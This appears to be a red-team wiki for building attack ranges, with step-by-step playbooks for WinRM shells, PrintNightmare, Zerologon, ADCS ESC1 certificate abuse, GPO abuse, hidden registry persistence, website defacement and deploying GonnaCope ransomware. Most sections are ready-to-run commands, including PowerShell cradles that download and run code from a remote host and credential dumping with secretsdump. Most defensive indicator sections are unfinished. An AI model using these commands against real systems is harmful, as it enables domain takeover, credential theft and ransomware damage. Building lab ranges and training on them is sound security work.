WinRM utilizes an API called wsman, which is built ontop of HTTP/S and operates on ports 5985 (HTTP) or 5986 (HTTPS) by default. Its legitimate use is comparable to psexec, and it can be used to perform administrative functions on remote hosts without the need for SSH or RDP. With the addition of PowerShell to the Windows ecosystem, it also goes by the name PowerShell Remoting, though these commands are just wrappers around WinRM.

Prerequisites

WinRM may require configuration to work, and the target user must have the "Remote Management User" permissions. Unless permissions are applied via group policy, users must be added to the "Remote Management Users" localgroup on a per-machine basis. Adding that user to the domain group only grants WinRM access to the domain controller.

Setup

To configure WinRM, run the following command as an administrator:

winrm quickconfig

Once WinRM has been successfully configured, add a user to the Remote Management User group using this command:

net localgroup "Remote Management Users" username /add

Execution

Method 1 - Evil-WinRM

https://github.com/Hackplayers/evil-winrm

Evil-WinRM is a tool which wraps WinRM commands to give you an interactive shell on a target machine. Evil-WinRM is written in Ruby, and requires it to be installed to work.

Using the credentials of the user that has access to the WinRM service, run one of the following commands to obtain access to the target.

Connect to a host:

evil-winrm --ip <target> --user <user> --password <password>

Connect to a host, passing the hash instead of using a password:

evil-winrm --ip <target> --user <user> --hash <nt_hash>

Indicators of Compromise

When connecting to a WinRM port, network traffic will show the upload of a "wsman" file to the target host over HTTP.

PrintNightmare (CVE-2021-1675)

Summary

PrintNightmare is a critical vulnerability that allows an attacker to obtain remote code execution and/or privilege escalation against any target Windows machine using the Spooler service that is enabled by default. While Microsoft has issued a patch for this vulnerability, if a few registry keys are present, then the target will still be vulnerable despite having the patch.

Prerequisites

Either a Windows server that doesn't have the patch released on July 1st, 2021, or must have some special registry keys added. Further, some form of SMB server and a custom compiled DLL is required to exploit this vulnerability. This exploit requires credentials to operate, even a low-privilege user may work.

Setup

Once the server is installed, and if the server contains the patch, then the following registry keys need to be installed:

HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint\RestrictDriverInstallationToAdministrators REG_DWORD 0x0
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall REG_DWORD 0x1

registry entries

Execution

Method 1 - Cube0x0's Repo

Clone Cube0x0's repo, as well as this DLL repo. Pick the DLL you want from the DLL repo and compile it on Windows, or using MinGW following the instructions in the README.

Once you have the DLL of choice compiled, and whatever listener/method of receiving or connecting to the shell configured, use impackets SMB server to host the file, and run the following commands:

impacket-smbserver -smb2support share /path/to/folder/with/DLL

Finally, exploit the target:

python3 CVE-2021-1675.py domain.com/username:'password'@target-ip '\\your-ip\share\your.dll'

successful connection

Indicators of Compromise

TODO

Windows Persistence

Invisible Registry Keys

Summary

It's possible to craft invisible registry keys that the Windows NT kernel is able to read, but not any user-mode applications. This allows for some unique cases of persistence that is hard to detect from the defenders perspective.

Prerequisites

The target must be windows, and you must run this tool with the appropriate access rights required for the hive you're trying to write to. HKLM requires Administrator/SYSTEM privileges, HKCU can be modified by the current user.

Setup

This setup requires downloading and executing the following utility, defender may or may not catch this file on disk. Potentially use a reflective PE loader to avoid this issue. The executable in question can be found at this repo. Go to Releases and download the latest executable, compilation is not required.

Execution

Method 1 - invisreg.exe

Running invisreg.exe without any options will provide the following output:

Usage: invisreg [operation] [path] [type] [value]
       operations:
         create - Create a new invisible registry key
         edit   - Edit an existing invisible registry key
         delete - Delete an existing invisible registry key
         query  - Query an invisible registry key
       path:
         Like this - HKLM:\PATH\TO\KEY
         supported hives:
           HKLM        - HKEY_LOCAL_MACHINE
           HKCU or HCU - HKEY_CURRENT_USER
           HKCR        - HKEY_CLASSES_ROOT
           HKCC        - HKEY_CURRENT_CONFIG
           HKU         - HKEY_USERS
       type:
         REG_SZ        - Value is expected to be a string
         REG_DWORD     - Value is expected to be a 32-bit integer
         REG_QWORD     - Value is expected to be a 64-bit integer
         REG_BINARY    - Value is expected to be the name of a file
       value:
         ...

Examples:
       invisreg create HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName REG_SZ "calc.exe"
       invisreg edit HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName REG_DWORD 1337
       invisreg delete HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName
       invisreg query HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName

To install a powershell cradle into the run key for persistence, the following command can be used:

.\invisreg.exe create HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\Cradle REG_SZ "powershell -enc <base64>"

Or for a specific user:

.\invisreg.exe create HKCU:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\Cradle REG_SZ "powershell -enc <base64>"

Indicators of Compromise

TODO

Windows Privilege Escalation

Microsoft Outlook Client Appointment Reminder Alarm Sound - Privilege Escalation Vulnerability (CVE-2023-23397)

Summary

CVE-2023-23397 affects all versions of the Microsoft Outlook desktop applications on Windows systems. It is important to note that this vulnerability does not affect Outlook web app or Microsoft 365. The attacker can obtain a user's credentials and potentially escalate privileges by directing the Outlook client to search for the appointment reminder alarm sound on a specified UNC path, thereby leaking Net-NTLMv2 hashes when the victim machine authenticates to the server residing on the said UNC path.

Please refer to the following from CVE Records for which specific versions are vulnerable.

Prerequisites

The prerequisite for the setup is to have a Windows Active Directory environment set up with an Exchange server, and host workstation(s) with Microsoft Outlook client software installed.

The range for testing the Proof of Concept was set up using Windows Server 2019, Exchange 2019, and Outlook Client 2019 installed on Windows 10

Setup

First, install a Domain Controller. The instructions can be found here.

Second, install Exchange.

  1. Download Exchange Server 2019 ISO from this link on your Server 2019

  2. In Server Manager click Add roles and features 

    1. Click Next 
    2. Choose Role-based... and click Next 
    3. Click Next 
    4. Check AD LDS and click Next 
    5. Click Next until you have the option to install  
    6. Check the Restart box and click Install 
    7. Click Close when it's available 
  3. In Server Manager click on Tools and select AD LDS Setup Wizard 

    1. Click Next for all defaults then click Finish 
  4. Open PS as admin and run the following command 

    Install-WindowsFeature NET-Framework-45-Features, Server-Media-Foundation, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, RSAT-Clustering-Mgmt, RSAT-Clustering-PowerShell, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation, RSAT-ADDS
    
  5. Install the prerequisites by following the instructions from this link and restart the box

  6. Right-click on the Exchange Server 2019 ISO and select Mount

  7. The new drive should open automatically, but open file explorer and open the DVD drive labeled ExchangeServer2019 if it doesn't open automatically.

  8. Run Setup

    1. Select Don't check for updates right now and click next
    2. Click next
    3. Accept and click next
    4. Select Use recommended settings and click next
    5. Select Mailbox Role and Automatically... then click next
    6. Click next
    7. Enter an organization name of your choice and click next
    8. Click next
    9. If you installed all the prerequisites, the check should be successful. If it asks you to install additional features or packages, install them and continue
    10. Click install, and the setup should take around 20 - 30 minutes
    11. Click finish when complete and restart the box
  9. Test that the configuration is correct by sending e-mails internally

    1. Open a web browser and navigate to https://ip-address-of-exchange-server-here/ecp
    2. Login with your DC Admin credentials
    3. Click the + sign and select User mailbox to create a user. You can create mailboxes for existing users in the domain, or vice versa -- you can create a new mailbox for a new user on the Exchange Server, which will create a user on the DC
    4. Enter an Alias
    5. Select New User and enter appropriate information in the fields
    6. Click Browse under Organizational Unit and select Users, then click Save
    7. Navigate to https://ip-address-of-exchange-server-here/owa and send a test e-mail to the new user.
    8. Sign out from the Administrator, and sign back in as the newly created user to verify that the e-mails can be sent back and forth.
  10. Open Windows Firewall

    1. Create Inbound and Outbound rules that allow:
      1. Ports 25, 389, 50636
      2. ICMP (for debugging purposes, if needed)

Third, set up workstations with Outlook 2019 Clients.

  1. Join your workstation to the AD environment you set up above. Note: Ensure that you assign a DNS server as the DC
  2. Install Microsoft Office 2019
    1. Microsoft Office 2019, as well as any activation needed can be found on this github repo
    2. Upon opening Outlook, enter the e-mail address of the new account you created earlier, and click Advanced Options > Let me set up my account manually > Connect
      1. Select Exchange (Not Exchange 2013 or earlier)
  3. Make sure you can send and receive e-mails by communicating with the Exchange Server.

Execution

Method 1 - PowerShell Script

The POC PowerShell script can be found here. All that is required is that you change the recipient's e-mail address, and the UNC path

image

Note: The listening server doesn't necessarily need to be an SMB share. You can use things like Responder tool as well

Indicators of Compromise

  • PowerShell execution logs
  • NTLM hash traveling to an external network
  • Authentication request via UNC path

Method 2 - Sending Appointments On Outlook Client

  1. On the Outlook client, click New Items -> Appointment image

  2. Manually select the sound file (to be played upon receiving the appointment reminder e-mail) and enter the UNC Path to the server

    image image

Indicators of Compromise

  • NTLM hash traveling to an external network
  • Authentication request via UNC path

Active Directory

SharpGPOAbuse

Summary

SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO. The original project hasn't been maintained in a couple of years, but this fork extends the functionality. The "Vulnerable GPO" is simply the GPO that you wish to target, this can even be the default domain controller GPO that is automatically created on every DC.

Prerequisites

In order to abuse GPO's, a configured Active Directory domain must be completely set up, and you must have access to a user that has privileges to modify GPO's. In order to modify a GPO, this utility relies on LDAP and SMB as well. This binary is also a PE executable, it expects to be ran on a Windows machine that's already been joined to the target domain controller.

Setup

Download the current release executable, and either reflectively load or upload to a domain-joined Windows machine that you have access to.

Execution

Method 1 - AddUserRights

The following are the available options to add rights to a user account via GPO:

Options required to add new user rights:
--UserRights
        Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
        Set the account to add the new rights.
--GPOName
        The name of the vulnerable GPO.

This command will add the "SeTakeOwnership" and "SeRemoteInteractiveLogonRight" privileges to the bob.smith user account.

SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

Indicators of Compromise

TODO

Method 2 - AddLocalAdmin

The following are the available options to add a local admin via GPO:

Options required to add a new local admin:
--UserAccount
        Set the name of the account to be added in local admins.
--GPOName
        The name of the vulnerable GPO.

The following will create a new local administrator account named "bob.smith":

SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Indicators of Compromise

TODO

Method 3 - AddUserScript / AddComputerScript

The following are the available options to add a user or computer script via GPO:

Options required to add a new user or computer startup script:
--ScriptName
        Set the name of the new startup script.
--ScriptContents
        Set the contents of the new startup script.
--GPOName
        The name of the vulnerable GPO.

The following will add a user script, this syntax also works with "--AddComputerScript":

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Indicators of Compromise

TODO

Method 4 - AddUserTask / AddComputerTask

The following are the available options to add a user or computer task via GPO:

Options required to add a new computer or user immediate task:

--TaskName
        Set the name of the new computer task.
--Author
        Set the author of the new task (use a DA account).
--Command
        Command to execute.
--Arguments
        Arguments passed to the command.
--GPOName
        The name of the vulnerable GPO.

Additional User Task Options:
--FilterEnabled
        Enable Target Filtering for user immediate tasks.
--TargetUsername
        The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
        The targeted user's SID.

Additional Computer Task Options:
--FilterEnabled
        Enable Target Filtering for computer immediate tasks.
--TargetDnsName
        The DNS name of the computer to target. The malicious task will run only on the specified host.

The following will add a user task, this syntax also works with "--AddComputerTask":

SharpGPOAbuse.exe --AddUserTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Indicators of Compromise

TODO

Method 5 - AddRegistryKey

The following are the available options to add a registry key via GPO:

Options required to set a registry key:
--KeyPath
        The path to the registry key.
--KeyName
        The name of the registry key.
--KeyType
        The type of data to place into the registry key.
--KeyData
        The data to place into the registry key.
--Hive
        The registry hive to affect, can be HKLM or HCU.
--GPOName
        The name of the vulnerable GPO.

Currently, only the REG_DWORD key is supported with this tool. Due to restrictions on the GPO, only HKLM and HCU are available as hives.

The following will add a registry key:

SharpGPOAbuse.exe --AddRegistryKey --Hive HKLM --KeyPath "Software\Policies\Microsoft\Windows\Installer" --KeyName AlwaysInstallElevated --KeyType REG_DWORD --KeyData 1 --GPOName "Vulnerable GPO"

Indicators of Compromise

TODO

Certificate Template Abuse

Summary

Certificate Template Abuse is a technique that can be used to impersonate/take control of any user in a domain given a misconfiguration in certificate templates in the Active Directory Certificate Services (ADCS). To learn more about this technique, please visit this excellent blog post.

Prerequisites

Active Directory with ADCS set up and configured. A certificate template must be created where the enrollee can specify the Subject Alternative Name (SAN), and can authenticate via the template. Further, a non-privileged account or group must be able to enroll into the template and the attacker must have control over that account or group.

Setup

First, a domain controller must be configured. It is important to NOT install the Certificate Services PRIOR to promoting to a domain controller. Failure to abide by this will prevent you from promoting the server into a domain controller. Thank you Windows! Once "Active Directory Domain Services" has been installed and the server has been promoted, then and only then install "Active Directory Certificate Services" from the "Add Roles and Features" menu.

All of the defaults when adding ADCS to the range are fine. Only the "Certificate Authority" is required, and the setup type of the CA should be set to "Enterprise CA".

image

Next, go to Tools -> Certification Authority, and then right click -> Manage on Certificate Templates.

image

Find a template that has the most features enabled that you want to use, in this case I chose "Workstation Authentication", and then I duplicated the template.

image

For ESC1, change the Subject Name to be handled by the enrollee by selecting "Supply in the request".

image

To add or remove specific features, modify the Application Policies in the Extensions tab.

image

To control who can enroll, change the settings in the Security tab.

image

With the new template created, close the window and then click on "Certificate Templates", and then go to Action -> New -> Certificate Template to Issue. Select the template that was just created in the following window and click OK.

image

LDAP needs to have SSL enabled to authenticate using the certificates. Reboot the DC after all of these changes have been made. God fucking help you if LDAPS doesn't work, cause he didn't help me.

Execution

Method 1 - ESC1

The first step is to determine if any certificate template is vulnerable. Using the certipy utility, run the following command to query the ADCS service:

certipy find -u username -p password -dc-ip <ip>

The command should product a txt and json file. Use the jq command below to trim out irrelevant details:

jq '."Certificate Templates" | .[] | select(.Enabled == true) | select(."[!] Vulnerabilities" != null) | {"Template Name", "Client Authentication", "Any Purpose", "Enrollee Supplies Subject", "Permissions", "[!] Vulnerabilities"}' <certipy_output>.json

JQ Output

In this case, the "CorpVPN" template can be used in this exploit. It's important to take note of the CA used in the template, underneath the "Certificate Authorities" block.

In this example, the "Domain Computers" group is able to enroll a certificate. If the user under our control has the ability to create a user account, the following command can be used:

addcomputer.py -dc-ip <ip> -computer-pass 'Password123' -computer-name 'ComputerName' 'domain.com/username:password' -computer
-group 'CN=Domain Computers,DC=domain,DC=com'

addcomputer.py

Now, using the computer account that was just created, the following certipy command will attempt to abuse the misconfiguration and will return the certifcate and key in a pfx file for the Administrator account:

certipy req -u 'ComputerName$' -p 'Password123' -dc-ip <ip> -ca '<ASSIGNED-CA>' -template 'CorpVPN' -upn 'Administrator'

If the command times out, repeat several times until the output resembles the following:

pfx file

Some tools may not be able to handle the pfx file, so the following certipy commands will break it into the certificate and key files:

certipy cert -pfx administrator.pfx -nokey -out administrator.crt
certipy cert -pfx administrator.pfx -nocert -out administrator.key

Finally, using this github repo, download the "passthecert.py" file to utilize the certificate and key to change the Administrators password:

passthecert.py -action modify_user -target administrator -new-pass 'Pwned!!' -domain 'domain.com' -dc-ip <ip> -crt administrator.crt -key administrator.key

passthecert

At this point the Administrator users password should be changed to "Pwned!!".

Indicators of Compromise

TODO

Active Directory Vulnerabilities

Zerologon (CVE-2020-1472)

Summary

This vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This flaw allows attackers to impersonate any computer, including the domain controller itself, and execute remote procedure calls on their behalf.

Prerequisites

This exploit requires at least one DC to be set up and configured. The DC must not have the patch, i.e. install the DC from before August 11th, 2020, or attempt to delete all of the KB security updates which may not work. Windows Server 2008 R2 SP1 requires an ESU license for the patch to apply, which is atypical, making this version the ideal target for configuring a range with this vulnerability.

Setup

If the prerequisites have been met, then any Zerologon exploit should work out of the box.

Execution

Method 1 - Changing DC's Machine Account Password

Clone the repository at https://github.com/risksense/zerologon, by either downloading the zip file or running the following command:

git clone https://github.com/risksense/zerologon

If there are any issues, update or reinstall impacket. Then, in the same directory as the cloned repository, run the following command:

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Then, the DC's machine accounts hash is set to 31d6cfe0d16ae931b73c59d7e0c089c0. This can be used with impacket's pass-the-hash functionality. I.e. dumping secret:

sudo secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

To reinstall the old machine password, you must use the Administrator hash you got from secretsdump, and then run secrets dump again using that hash:

sudo secretsdump.py -hashes :<Administrator NTLM Hash> 'DOMAIN/Administrator@dc_ip_addr'

This will give you much more output than before, and this will also give you the old machine account hash:

image

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Indicators of Compromise

TODO

Impact

Website Defacement

Summary

Website defacement is a destructive and loud method of denying or humiliating a service or company. In this case, the website will be replaced with a "King of the Hill" themed propane selling service.

Prerequisites

The target webserver must support PHP in order to host the defaced webroot contents.

Setup

Download this file, it contains the contents to be placed in the targets webroot. Often times this is in /var/www/html, but check the running webservers config file to verify.

Execution

Method 1 - Extract using Unzip

To upload the file to the machine, one possible way is to use scp or to host a python webserver and then use wget on the target webserver. Prior to extracting, either delete or move the contents of the old webroot. Then, once the file is uploaded, its time to locate and enter the webroot of the server, then run the following command:

cd /var/www/html # Most common webroot location
unzip /path/to/papa_www.zip

Indicators of Compromise

TODO, but its going to be loud and obvious

GonnaCope

Summary

The GonnaCope Ransomware is among the more harmful ransomware threats. It is capable of locking the data of its victims completely. Furthermore, thanks to the sufficient strength of the encryption algorithm, the affected files are unlikely to ever be restored without assistance from the attackers.

Prerequisites

  • Administrator with high integrity or NT/Authority System shell.
  • Defender disabled or definitions deleted.

Setup

Download the 7z Compressed ransomware from here. The password is 'infected' without the single quotes. Place the ransomware onto the system via download or GPO.

Execution

Method 1 - Execution via command prompt or RDP session.

Within the shell type:

.\G0nnaC0pe.bat

OR

Navigate to the directory of the ransomware and double click the G0nnaC0pe.bat file.

Indicators of Compromise

  • The ransomware encrypts files found and adds a ".cope" extension to the filename.

  • The mouse buttons are inverted

  • The ransomware spawns the below shell:

gonnacope

Contributors

Thank you for checking out our website! This project serves to be the culmination of all our knowledge regarding cybersecurity. See the associated github page.

This project is led and maintained by: